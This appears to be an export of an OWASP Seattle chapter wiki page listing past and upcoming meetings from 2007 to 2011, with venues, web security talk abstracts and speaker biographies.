The talk will conclude with a look towards the future of security testing in the QA environment and an overview of how multiple analysis techniques, both static and dynamic, can work together to provide better software assurance.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
'''Taylor McKinley''', Product Manager, Fortify Software<br />
<br />
Mr. McKinley brings a rich business and technology background to Fortify Software, including strategic advisory roles at Morgan Stanley Dean Witter, New England Capital Partners and as a Principal at The Parthenon Group. Mr. McKinley has a BA from Williams College and an MBA from Stanford Business School.<br />
<br />
'''Speaker: Scott Stender'''<br />
<br />
'''Concurrency Attacks in Web Applications'''<br />
<br />
Modern web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable web site in a matter of minutes.<br />
<br />
Highly parallelized, object-oriented web application frameworks encourage programming practices that make managing state difficult for a typical programmer. In order to have a web application that is robust in a multi-threaded environment, the developer must carefully manage access to all resources that can shared by threads. Global variables, session variables, database access, and back-end systems are common examples of such resources, not to mention application-specific resources.<br />
<br />
Concurrency flaws result when security-sensitive resources are not managed properly. As we have seen with almost every other prevalent class of security flaws, mistakes happen often when doing the right thing is difficult. To make things worse, concurrency flaws are often subtle and are identified only through difficult targeted testing.<br />
<br />
This presentation will provide brief technical background against this class of flaw and enumerate testing techniques that help identify when flaws are present.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
'''Scott Stender''' is a founding partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at companies such as @stake and Microsoft. Scott is a noted researcher who focuses on secure software engineering and security analysis of core technologies. He holds a BS in Computer Engineering from the University of Notre Dame.<br />
<br />
=== Previous Event 4 March (Tuesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
<br />
'''Date:''' 03/04/2008<br />
<br />
'''Time:''' 6:30PM<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Billy Rios'''<br />
<br />
'''Bad Sushi - Beating Phishers at Their Own Game'''<br />
<br />
This talk will expose tactics and tools used by phishers, show how easy it is to hack into servers that are used to perform phishing, demonstrate how easy it is so follow a phsisher's trail to find out how they share information on US Citizens including SSNs, bank account numbers, credit card numbers, ATM PINs, you name it.<br />
<br />
Phishers usually setup their sites on servers they have compromised. In other words, the phishers have already done the hard work and it is easy to gain access to these servers. Due to the sheer volume of sites that need to be setup to perform a successful phish, phishers tend to be sloppy and leave traces everywhere.<br />
<br />
This talk will expose some of the tactics and tools used by phishers. Actual walk-through of how compromised hosts were accessed to gain information about the phishers will be presented.<br />
<br />
This talk will also show how easy it is to construct a trail from a compromised host to obtain information about individuals that is spewed on hacker message boards located outside the United States.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
'''Billy Rios''' lives in a phish bowl and is constantly being sent emails from acquaintances all over the world. Billy has won the Internet lotto several times, is expecting large sums of abandoned money from a long lost relative in the Congo, and has received checks accidentally made out for 30,000 instead of 30 US dollars.<br />
<br />
<br />
'''Speaker: Jon McClintock'''<br />
<br />
Session management is one of the most overlooked areas of web application security, and yet it can also be the most challenging feature to get right in your web application. This talk will provide a brief overview of web session management, followed by an exposition into how several common web application frameworks implement session management, finishing with a discussion of several classes of vulnerabilities that can arise through poor session management.<br />
<br />
'''Jon McClintock''' is a Senior Consultant for Leviathan Security Group, where he specializes in application security from design through implementation and into deployment. Prior to Leviathan, Jon was a Senior Software Engineer on Amazon.com's Information Security team, where he worked with software teams to define security requirements, assess application security, and educate developers about security software best practices.<br />
<br />
'''Date: 1/23/2008'''<br />
<br />
'''Speakers:'''<br />
<br />
'''Waqas Nazir''', DigitSec<br />
<br />
[https://www.owasp.org/images/e/e9/Emerging_Threats_in_Distributed_Applications_%28Web_2%29.ppt presentation]<br />
<br />
Waqas Nazir has been working as an Information Security Consultant for clients such as Microsoft where he has delivered services in various arenas of information security. These include code reviews, black box assessments, product reviews, custom tools development for complex security problems, policy and process development. He has also worked with Microsoft Research (MSR) to develop a code analysis tool used for identifying areas of vulnerabilities in code. He has also been featured in Microsoft's Information Security Newsletter.<br />
<br />
Presentation Title: Emerging threats in Web 2.0<br />
<br />
Web 2.0 applications provide many rich features today such as hosting third party RSS Feeds, hosting third party web pages, translation services, and cross domain communication. While these rich features provide great functionality to end users, they can have serious security implications if not designed properly. Moreover, implementation flaws plague many of these features. This presentation will focus on some new emerging threats to Web 2.0 applications from a design and implementation perspective, leaving out the often covered Web 2.0 Vulnerabilities (Ajax, XSRF, etc).<br />
<br />
<br />
'''Chris Clark''', iSEC Partners<br />
<br />
Chris Clark is a Senior Security Consultant at iSEC Partners, Inc. He possesses several years of experience in secure application design, penetration testing, and security process management. Most recently Chris worked for Microsoft performing security analysis and verification on enterprise management software and was previously responsible for the security of a web-based payment platform processing over 20 million credit card transactions per day. Chris has extensive experience in developing and delivering security trainings for large organizations, software engineering utilizing Win32 and the .Net Framework, and analyzing threats to large scale distributed systems. At Microsoft, Chris was responsible for the coordination of multiple product groups following the Microsoft Secure Development Lifecycle.<br />
<br />
Presentation Title: Ruby on Rails Security<br />
<br />
Ruby on Rails has been hailed for its ability to increase developer productivity by making web development easier. Though Ruby on Rails may help developers create sites more quickly, it is no more immune to security threats than other web development frameworks. Chris Clark will present the means by which the OWASP Top Ten manifest themselves in a Ruby on Rails environment, provide best practices for preventing these attacks, and discuss his ongoing research in Ruby-specific security concerns.<br />
<br />
<br />
11/29/2007 @ 6:30PM PST - Seattle chapter meeting<br />
<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
<br />
'''Date:''' 11/29/2007<br />
<br />
'''Time:''' 6PM<br />
<br />
'''Speakers:'''<br />
<br />
'''Tom Gallagher''' has been intrigued with both physical and computer security from a young age. He is currently the lead of the Microsoft Office Security Test team. This team is primarily focused on penetration testing, writing security testing tools, and educating program managers, developers, and testers about security issues. Tom recently co-authored the MSPress title "Hunting Security Bugs".<br />
<br />
Presentation Title: Hunting security bugs in your code<br />
<br />
Description: Finding security bugs is often regarded as an activity requiring secret powers or extremely specialized knowledge. Some security bugs are difficult to uncover and require deep knowledge. However, with basic knowledge many areas can be tested without much effort. This presentation will show how to perform basic security testing using simple tools and the difference in effort between finding a bug and exploiting it.<br />
<br />
<br />
'''David E Stevens III''', Senior ROI Analyst, Symplified Inc.<br />
<br />
In 2006, Symplified recruited Stevens for his expertise and ability to clearly explain concepts like Return On Investment (ROI) and Total Cost of Ownership (TCO). Over the past 5 years Stevens has given dozens of presentations regarding ROI, and is a confident and charismatic speaker. Stevens is touring the U.S. representing Symplified and teaching how ROI can be applied to security and Identity investments to technical security user groups.<br />
<br />
Synopsis of "Understanding ROI, TCO and other key financial aspects of IT Security"<br />
<br />
In this presentation, Stevens teaches how security and IT professionals can obtain financing for important security initiatives using accounting principles such as Return On Investment (ROI) and Total Cost of Ownership (TCO). In this 30-minute presentation, the group learns what these terms mean and how they can be used to show the value of security software purchases. He concludes by sharing other tips on how the technology professional can better communicate with their business counterparts. This non-sales presentation is intended to equip attendees with useful tools that articulate the benefits of investing in IT security. Learn from Symplified's more than 30 years combined experience in Identity Management at hundreds of Fortune 500 organizations worldwide. Attendees receive a useful ROI calculator for IDM investments. This is a must attend presentation for anyone who has ever had trouble getting the funding they needed for a security software investment!<br />
<br />
<br />
09/06/2007 @ 6PM PST - Seattle chapter meeting<br />
<br />
'''Details:'''<br />
Location: <br />
Bellevue Las Margaritas <br />
437 108th Ave NE<br />
Bellevue, WA 98004<br />
(425) 453-0535<br />
<br />
Time: 6 o'clock<br />
<br />
'''Speakers:'''<br />
* '''Rob Rachwald''' - Rob is a 10-year veteran of the high tech industry. Rob started his tech career at Intel, where he worked on automating their complex supply chain. Rob managed US product marketing for Commerce One and managed their marketing efforts in Asia Pacific. Rob, then, managed marketing for Coverity and joined Fortify as the Director of Product Marketing focusing on security and financial services. <br />
** Online Banking - Abstract: Banks, often the biggest target of cyber attacks, have set an example for responsible security strategies. How do the world's leading financial institutions balance risk against the pressures of delivering software to customers quickly? How are developers trained to write code securely? How are software security tools, such as dynamic and static analysis, deployed for optimal use?<br />
* '''Damon Cortesi''' - Damon has worked in network and application security risk management for nearly a decade, beginning with his work as Systems and Security Administrator at his alma mater. Following school, he entered the professional arena as an Information Security Consultant for one of the top 10 CPA firms serving financial institutions including banks, credit unions, and event the major credit reporting bureaus. Most recently at IOActive, Mr. Cortesi has been serving the specialized needs of top technology companies in addition to standard penetration testing, web application security assessments, source code reviews, and PCI assessments.<br />
** Web Hacking 101 introduces the basic concepts of web application security including SQL Injection, Cross-Site Scripting (XSS), and typical application logic flaws found in an ASP-based web application. These concepts are then put to use in a live demonstration that illustrates the all-too-common ways of attacking a web application and gaining unauthorized access to sensitive information or restricted areas of a website. Demos will included manual SQL Injection techniques as well as the use of free/open-source tools used to expedite the extraction process, examples of both reflected and stored XSS that can be used to elevate the privileges of a user, and standard authorization bypass issues that developers often ignore. Finally, basic mitigation techniques will be discussed that can be put into place by developers to prevent these common hacking techniques.<br />
<br />
''' Update: ''' - Rob's slides can be downloaded from [http://www.owasp.org/images/f/f6/SANS_Online_Banking_Case_study.ppt here].<br />
''' Update #2: ''' - Damon's slides can be found [https://www.owasp.org/images/3/32/Web_Hacking_101.pdf here].<br />
<br />
----<br />
<br />
2/28/2007 @ 6PM PST - Seattle chapter meeting<br />
<br />
'''Details:'''<br />
<br />
Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)<br />
<br />
Time: 6 o’clock. <br />
<br />
'''Speakers:'''<br />
* '''Dinis Cruz (Chief OWASP Evangelist)''' - Directly from London, Dinis will be doing two presentations at this event:<br />
** '''Buffer Overflows on .Net and Asp.Net''' - One of the common myths about the .Net Framework is that it is immune to Buffer Overflows. Although this might be correct in pure managed and verifiable .Net code, large percentage of .Net and Asp.Net applications code is unmanaged code. In this talk Dinis will show the areas in .Net and Asp.Net applications that are vulnerable to Buffer Overflows (including the demo of a .Net Buffer Overflow Fuzzer).<br />
** '''OWASP, the Open Web Application Security Project''' - The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. All of the OWASP tools, documents, blogs, and chapters are free and open to anyone interested in improving application security. In this presentation Dinis will show the latest guides and tools from OWASP which should be part of every company's security efforts.<br />
** '''0wning Vista's userland - The CAS / UAC missed opportunity, and what I think MS should had done''' - In this presentation Dinis will explore the missed opportunity by Microsoft to use technologies like .Net's CAS (Code Access Security) and Vista's UAC (User Access Control) to create secure and trustworthy userland environments that protect the user's assets. In the hope that might make a small difference, ideas and solutions for the future will also be presented.<br />
<br />
* '''Brad Hill (Senior Security Consultant with iSEC Partners)''', will be speaking on:<br />
** '''XML Digital Signature and Encryption: Use and Abuse''' - The WS-Security set of standards is on the threshold of ubiquitous deployment and XML applications have already taken over the world. This presentation looks at two underlying technologies, XML Digital Signature (XMLDSIG) and XML Encryption (XMLENC), their place in the Web Services stack and their applicability to non-SOAP XML applications. Beginning with a basic overview of the standards, we will uncover some surprising caveats and risks in the use of these technologies.<br />
<br />
=== Previous Meeting 8 January 2007===<br />
1/8/2007 @ 6 o'clock - Seattle chapter meeting. <br />
<br />
'''Details:''' Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)<br />
Time: 6 o’clock. <br />
<br />
Speakers:<br />
<br />
Ward Spagenberg of IOActive on the topic "Unraveling PCI".<br />
<br />
Since there will be free food, beer and pop please let Mike de Libero know so we know how much to order.<br />
We look forward to seeing you all there!<br />
<br />
[[Category:Washington]]</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=Seattle&diff=119195Seattle2011-10-17T03:39:17Z<p>Mcurphey: </p>
<hr />
<div>{{Chapter Template|chaptername=Seattle|extra=The chapter leader is [mailto:mark@curphey.com Mark Curphey] ([http://www.twitter.com/curphey @curphey]). We meet monthly usually in downtown Seattle an manage our events using MeetUp. You must RSVP to attend meetings using [http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/ Meetup]. The chapter has a Twitter account [http://www.twitter.com/owaspseattle @owaspseattle] for local and event news.<br />
<br />
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-seattle|emailarchives=http://lists.owasp.org/pipermail/owasp-seattle}}<br />
<br />
<br />
== Next Meeting - November 17th, 2011 ==<br />
<br />
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]<br />
<br />
Talk : [http://blogs.adobe.com/asset/2011/04/nosql-but-even-less-security.html No SQL and even less security].<br />
Speaker : Bryan Sullivan<br />
<br />
Location : <br />
KPMG, Suite 900<br />
801 second avenue<br />
Seattle, WA<br />
<br />
Time : 6pm to 8pm<br />
<br />
To attend this meeting you must RSVP via the Meetup page due to limited spaces. <br />
<br />
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]<br />
<br />
== December Meeting is Being Scheduled Now ==<br />
<br />
==Past Events==<br />
<br />
<br />
=== Previous Event 11 August (Wednesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 8/11/2010 @ 6:30ish<br />
<br />
''Presentations:''<br />
<br />
'''How OWASP Works and Guided Tour of OWASP Projects'''<br />
<br />
'''Speaker: Dinis Cruz'''<br />
<br />
This presentation will focus on my experience in getting things done at OWASP, what resources are available and what types of initiatives should the local chapters be doing. In addition to a quick overview of a number of key OWASP projects, this talk will also provide a tutorial on how the OWASP WIKI (MediaWiki based) can be used as a database (using the MediaWiki templates technology)<br />
<br />
--------------------------------------------------------<br />
<br />
'''Using the O2 Platform to Consume OWASP projects'''<br />
<br />
'''Speaker: Dinis Cruz'''<br />
<br />
This presentation will focus on how to consume the OWASP Wiki and a number of OWASP projects using the OWASP O2 Platform. The O2 Platform has powerful technology and capabilities for both BlackBox and WhiteBox analysis and this presentation will provide examples on how to use O2 with: WebGoat, WebScarab, Code Crawler, Dir Buster, Testing Guide, Code Review Guide and OpenSAMM<br />
<br />
<br />
The O2 Platform is focused on automating application security knowledge and workflows. It is specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews (BlackBox + WhiteBox). In addition to the manual findings created/discovered by security consultants, the OWASP O2 Platform allows the easy consumption of results from multiple OWASP projects and commercial scanning tools. This allows security consultants to find, exploit and automate (via Unit Tests) security vulnerabilities usually dismissed by the community as impossible to find/recreate. More importantly, it provides the Security Consultants a mechanism to: a) 'talk' with developers (via UnitTest) , b) give developers a way to replicate + "check if it's fixed" the vulnerabilities reported and c) engage on a two-way conversion on the best way to fix/remediate those vulnerabilities.<br />
<br />
'''Dinis Cruz''' is a Security Consultant based in London (UK) and specialized in: ASP.NET/J2EE Application Security, Application Security audits and .NET Security Curriculum Development.<br />
<br />
For the past years Dinis has focused on the field of Static Source Code analysis, from May 2007 to Dec 2009 he worked as a independent consultant for Ounce Labs (bought by IBM in July 2009) where during active security engagements using Ounce's technology he developed the Open Source codebase which now is the foundation of the OWASP O2 Platform.<br />
<br />
Dinis is currently focused on making the O2 Platform the industry standard for consuming, instrumenting and data-sharing between the multiple WebAppSec tools, the Security consultants and the final developers.<br />
<br />
Dinis is a also active trainer on .Net security having written and delivered courses for IOActive, Foundstone, Intense School and KPMG (at multiple locations including BlackHat), and has delivered a number of presentations and keynote speeches at multiple OWASP and Security related conferences<br />
<br />
At OWASP, Dinis is the leader of the OWASP O2 Platform project, member of the OWASP Global Projects Committee, chair of the OWASP Connections Committee and member of the OWASP Board<br />
<br />
<br />
=== Previous Event 28 April (Wednesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 4/28/2010 @ 6:30ish<br />
<br />
''Presentations:''<br />
<br />
'''When Tools Are Not Enough – Best Practices for Securing Web Applications'''<br />
<br />
'''Speakers:''' Walter Pearce & Wade Winright from IOActive<br />
<br />
The demands of regulatory compliance may have you looking to vulnerability scanning tools in the hopes of finding a silver bullet to examine your web applications. However, it is not realistic to expect scanners alone to accurately determine the impact of the web application vulnerabilities they detect. In this presentation, Walter Pearce and Wade Winright will discuss best practices for securing web applications, including how to effectively utilize tools in conjunction with penetration testing.<br />
<br />
'''Walter Pearce''' is a Senior Security Consultant at IOActive, experienced in enterprise-level application assessment and consultation. At IOActive he performs penetration testing, identifies system vulnerabilities, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services. Pearce has performed security assessments and IT security support services for many companies in the Fortune 100, including involvement in the largest existing penetration test of a major educational institution. He regularly leads IOActive training courses on numerous topics that include web application security, secure coding in C# or C++, and threat modeling.<br />
<br />
'''Wade Winright''' is a Security Consultant at IOActive, experienced in security testing, and network and systems installation and configuration. At IOActive he performs vulnerability and enterprise risk assessments of application, systems, and infrastructure, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services.<br />
Winright is a SANS GIAC Certified Incident Handler with a focus on incident handling and hacker tools/techniques, and also is certified by the E-Commerce Council CEH, focused on vulnerability/penetration testing and countermeasures.<br />
<br />
----<br />
<br />
'''Protecting Your Applications from Backdoors:'''<br />
<br />
How to Secure Your Business Critical Applications from Time Bombs, Backdoors & Data<br />
<br />
'''Speaker:''' Clint Pollock from Veracode<br />
<br />
With the increasing practice of outsourcing and using 3rd party libraries, it is nearly impossible for an enterprise to identify the pedigree and security of the software running its business critical applications. As a result backdoors and malicious code are increasingly becoming the prevalent attack vector used by hackers. Whether you manage internal development activities, work with third party developers or are developing a COTS application for enterprise, your mandate is clear- safeguard your code and make applications security a priority for internal and external development teams. In this session we will cover;<br />
Prevalence of backdoors and malicious code in third party attacks<br />
Definitions and classifications of backdoors and their impact on your applications<br />
Methods to identify, track and remediate these vulnerabilities<br />
<br />
'''Clint Pollock''' is a Senior Solutions Architect at Veracode. Since 1997, he has also created security solutions for large-scale enterprise environments on behalf of CREDANT Technologies and Netegrity. In his current role, Clint helps globally distributed organizations evaluate, track, and mitigate their online business risk. Clint's greatest strengths are his enthusiasm, experience and determination to help customers succeed in maintaining secure, compliant systems, and avoid the consequences and bad headlines that come with application security breaches. Clint resides in Chicago, IL.<br />
<br />
=== Previous Event 3 February (Wednesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 2/3/2010 @ 6:30ish<br />
<br />
'''Speakers:''' <br />
<br />
'''Speaker: Hidetake Jo'''<br />
<br />
'''Same Origin Policy'''<br />
<br />
'''Presentations:'''<br />
<br />
[[File:SameOriginPolicy.ppt]] - Same Origin Policy slide deck<br />
<br />
[[File:Rendezvous.ppt]] - Presentation on the Rendezvous toolset<br />
<br />
Same origin policy is a simple and important security policy which protects millions of users on the web. Often times the policy is over simplified and there is a misconception that there is one consistent policy being used across all web technologies. Unfortunately this can’t be further from the truth. Different browser brands, RIA plugins, various scripting languages and features within the browser environment have their own interpretation of the same origin policy. Not understanding the subtle differences can be catastrophic to web security. This presentation tries to summarize the deltas in the same origin policy. This is also a call for action to involve the community to more comprehensively document the policies. <br />
<br />
'''Hidetake Jo''' is part of the Trustworthy Computing team in Office. He works with teams throughout Office to identify threats and ways to mitigate those threats, he also gets to break stuff. Hidetake has written many penatration testing tools that are used throughout Microsoft.<br />
<br />
-----------------------------------------------<br />
<br />
'''Speaker: Pravir Chandra'''<br />
<br />
'''Open Software Assurance Maturity Model (OpenSAMM)'''<br />
<br />
'''Presentation:''' <br />
<br />
Slide deck can be found [http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt here]<br />
<br />
The Open Software Assurance Maturity Model (SAMM) (http://www.opensamm.org/) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program. This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. OpenSAMM is an open a free project and has recently been donated to the Open Web Application Security Project (OWASP) Foundation. For more information on OpenSAMM, visit http://www.opensamm.org/.<br />
<br />
'''Pravir Chandra''' is Director of Strategic Services at Fortify Software and works with clients on software security assurance programs. Pravir is recognized for his expertise in software security, code analysis, and his ability to strategically apply technical knowledge. Prior to Fortify, he was a Principal Consultant affiliated with Cigital and led large software security programs at Fortune 500 companies. Pravir Co-Founded Secure Software, Inc. and was Chief Security Architect prior to its acquisition by Fortify. He recently created and led the Open Software Assurance Maturity Model (OpenSAMM) project with the OWASP Foundation, leads the OWASP CLASP project, and also serves as member of the OWASP Global Projects Committee. Pravir is author of the book Network Security with OpenSSL. <br />
<br />
=== Previous Event 11 August (Tuesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 8/11/2009 @ 6:30ish<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Anil Kumar Revuru'''<br />
<br />
'''Slides: ''' [[file:Anti-XSS_3.0_RV.pptx]]<br />
<br />
'''The Microsoft Anti-Cross-Site Scripting Library'''<br />
<br />
The Microsoft Anti-Cross-Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique — sometimes referred to as the principle of inclusions — to provide protection against XSS attacks. This approach works by first defining a valid or allowable set of characters, and encodes anything outside this set (invalid characters or potential attacks). The white listing approach provides several advantages over other encoding schemes. The following are some new features of Anti-XSS library v3.0.<br />
* An expanded white list that supports more languages<br />
*Performance improvements<br />
*Performance data sheets (in the online help)<br />
*Support for Shift_JIS encoding for mobile browsers<br />
*Security Runtime Engine (SRE) HTTP module<br />
*A sample application<br />
<br />
In this session, we will learn in-depth how Anti-XSS works and learn more about its new features.<br />
<br />
'''Anil Kumar Revuru''' currently works for Information Security Tools team in Microsoft as Senior SDE where he is responsible for architecting security tools. In his previous life at Microsoft, Anil conducted security design reviews, threat modeling, and application and source-code assessments. He has authored security tools and has presented security courses internally at Microsoft. He excelled in his abilities by developing security tools such as Microsoft Threat Analysis and Modeling Tool and Anti-XSS Library. Anil holds a Diploma in Mechanical Engineering from JNTU Hyderabad. Anil displayed expert proficiency in the substantive and technical areas of design and development. Has keen interest in photography, xbox and computer hardware.<br />
<br />
-----------------------------------------------<br />
<br />
'''Speaker: Andre Gironda'''<br />
<br />
'''Using ASVS with the Code Review Guide, Testing Guide, and Time Management'''<br />
<br />
The OWASP Application Security Verification Standards, which defines<br />
four levels of web application security verification, lays down a<br />
framework for security architecture review. While the ASVS includes<br />
many requirements for controls, it does not suggest which tools,<br />
techniques, timeline or methodologies to utilize. The OWASP Code<br />
Review and Testing Guides provide the technical practices and suggest<br />
or hint at tools, but also lack the timeline and methodology necessary<br />
to complete an application penetration-test or SDLC integration<br />
project for proper application security hygiene.<br />
<br />
This presentation will provide the 1000 foot view all the way down to<br />
the nitty gritty details of how to perform ASVS activities using OWASP<br />
resources, as well as some OWASP and non-OWASP tools (freeware or<br />
demoware). Example timelines for typical ASVS activities, including<br />
reports, will be discussed so that any sort of application security<br />
project can be scoped properly, delivered on-time, and within budget.<br />
<br />
'''Andre Girond'''a is an application security specialist with a global<br />
security consulting firm providing IT security services to the Fortune<br />
500 and financial institutions as well as U.S. and foreign<br />
governments. Prior to his current employment, Andre held a number of<br />
payment application security positions in addition to working for the<br />
largest online auction website. He is currently a leader for the Open<br />
Web Application Security Project (OWASP), where he co-produces the<br />
global OWASP News Podcast.<br />
<br />
=== Previous Event 28 April (Tuesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 4/28/2009<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Scott Stender'''<br />
<br />
'''Securing our Legacy - Responding to the call to provide practical security assurance'''<br />
<br />
Every few months witnesses the release of a much-hailed report from an industry organization, think tank, or government agency calling for the software that runs our critical infrastructure to be secured. Making the call is easy, acting on it is only slightly harder, but succeeding at it is incredibly difficult.<br />
<br />
Of all of the tasks that must be undertaken to truly meet the call, the single biggest challenge I have seen companies face is delivering security assurance on legacy code. This talk will explore the challenge of providing security assurance for these old, little-loved, but heroic systems that power our lives. More importantly, It will include guidance for software development managers and engineers seeking to gain insight into the operation of their legacy systems, mechanisms by which important security assertions can be gathered, and practical methods for carrying out penetration tests and code reviews with the aim of providing a high degree of security assurance.<br />
<br />
Scott Stender is a co-founder and Partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at @stake and Microsoft in previous lives. <br />
<br />
In his research, Scott focuses on secure software engineering methodology and analysis of core technologies. Scott has been published in publications such as IEEE Security & Privacy, and has presented at Microsoft Blue Hat and at Black Hat conferences on several occasions. Scott holds a BS in Computer Engineering from the University of Notre Dame.<br />
-----------------------------------------------<br />
<br />
'''Speaker: Ashok Misra'''<br />
<br />
'''Application Issues with encryption of PANs'''<br />
<br />
There are unique application issues related to the storage and processing of credit card numbers for ecommerce transaction processing. This talk focuses on issues with the various cryptographic primitives used for PANs.<br />
<br />
Ashok Misra is an Ecommerce professional with more than 10 years experience delivering results for leading ecommerce merchants.<br />
<br />
He is currently Sr. Manager Payments & Security in the Media Applications Platform Development Division for e-Commerce products for Real Networks, Inc in Seattle, Washington. He brings an unusually comprehensive insight into security and payments processing.<br />
<br />
Ashok is responsible for the Billing for Real’s Consumer Divisions. He takes a leadership role in identifying new opportunities in the consumer payments domain. He has extensive hands on experience in merchant integration with several leading payment providers.<br />
<br />
Prior to working with Real Networks he built backend components for ecommerce for Amazon.com.<br />
<br />
He has comprehensive domain knowledge in consumer payments over the internet with Credit Cards, EU Direct Debit , Real time Bank Transfers , Redirect Payment Instruments, Fraud Detection and PCI Compliance.<br />
<br />
=== Previous Event 23 October (Thursday) ===<br />
<br />
'''Location:''' 810 Third Avenue<br />
<br />
Seattle, WA 98104<br />
<br />
Conference room on the first floor <br />
<br />
'''Date:''' 10/23/2008<br />
<br />
'''Time:''' 6:30PM<br />
<br />
'''Speakers:'''<br />
<br />
<br />
'''Speaker: Michael Eddington'''<br />
<br />
'''Fuzzjacking!'''<br />
<br />
Fuzzing is one of the hot new buzzwords in the security industry and<br />
if your clients had not already ask for it they will. This talk will<br />
introduce the subject, talk about different types of fuzzers,<br />
integration into SDL, when to fuzz and also talk a bit about the Peach<br />
Fuzzing Platform. Questions and interaction requested :)<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
Michael Eddington is a founding principal of Leviathan Security Group with over ten years<br />
experience in computer security, with expertise in application and<br />
network security, through threat modeling. Michael founded the<br />
security services practice for IOActive and co-founded the Security<br />
Services Center for Hewlett-Packard's services division. Michael is<br />
also an accomplished software developer, having participated in a<br />
number of open-source security development projects ranging from the<br />
Trike threat modeling conceptual framework to the Peach Fuzzer<br />
Platform.<br />
<br />
<br />
'''Speaker: Chris Weber'''<br />
<br />
'''Exploiting Unicode-enabled Software'''<br />
<br />
This talk will showcase some of the ways that Unicode has been leveraged to cause software to break. We will survey the security issues outlined in Unicode Technical reports 36 and 39. The issues highlighted will be illustrated by examples of historical Unicode-related security flaws in popular software and Web applications. For each vulnerability we will assess the damage that was inflicted, describe how the exploit worked, and discuss the root cause. Examples will include demonstrations of how clever attackers can exploit Unicode-enabled software to run arbitrary code or takeover the machine.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
Chris Weber co-founded Casaba Security who focuses on security testing for some of the world's leading software development companies and online properties. He has authored several security books, articles and presentations. He has worked as a security researcher and consultant for seven years and has identified hundreds of security vulnerabilities in many widely used software products<br />
<br />
=== Previous Event 12 June (Thursday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
<br />
'''Date:''' 06/12/2008<br />
<br />
'''Time:''' 6:30PM<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Taylor McKinley'''<br />
<br />
'''Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking'''<br />
<br />
Dynamic taint propagation allows testers to find vulnerabilities without modifying existing functional tests. It enables true security testing inside a QA organization because it allows tight integration with existing QA infrastructure and solid usability for non-security experts. This talk will:<br />
<br />
*Explain how dynamic taint propagation works.<br />
*Show how to retrofit an existing executable to perform dynamic taint propagation.<br />
*Demonstrate how a tester can use a typical suite of functional tests to find vulnerabilities, without the need for malicious input or security expertise.<br />
*Compare this approach with the effectiveness of popular penetration testing tools--particularly those acquired by IBM and HP in 2007--when deployed in a QA environment.<br />
<br />
The talk will conclude with a look towards the future of security testing in the QA environment and an overview of how multiple analysis techniques, both static and dynamic, can work together to provide better software assurance.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
'''Taylor McKinley''', Product Manager, Fortify Software<br />
<br />
Mr. McKinley brings a rich business and technology background to Fortify Software, including strategic advisory roles at Morgan Stanley Dean Witter, New England Capital Partners and as a Principal at The Parthenon Group. Mr. McKinley has a BA from Williams College and an MBA from Stanford Business School.<br />
<br />
'''Speaker: Scott Stender'''<br />
<br />
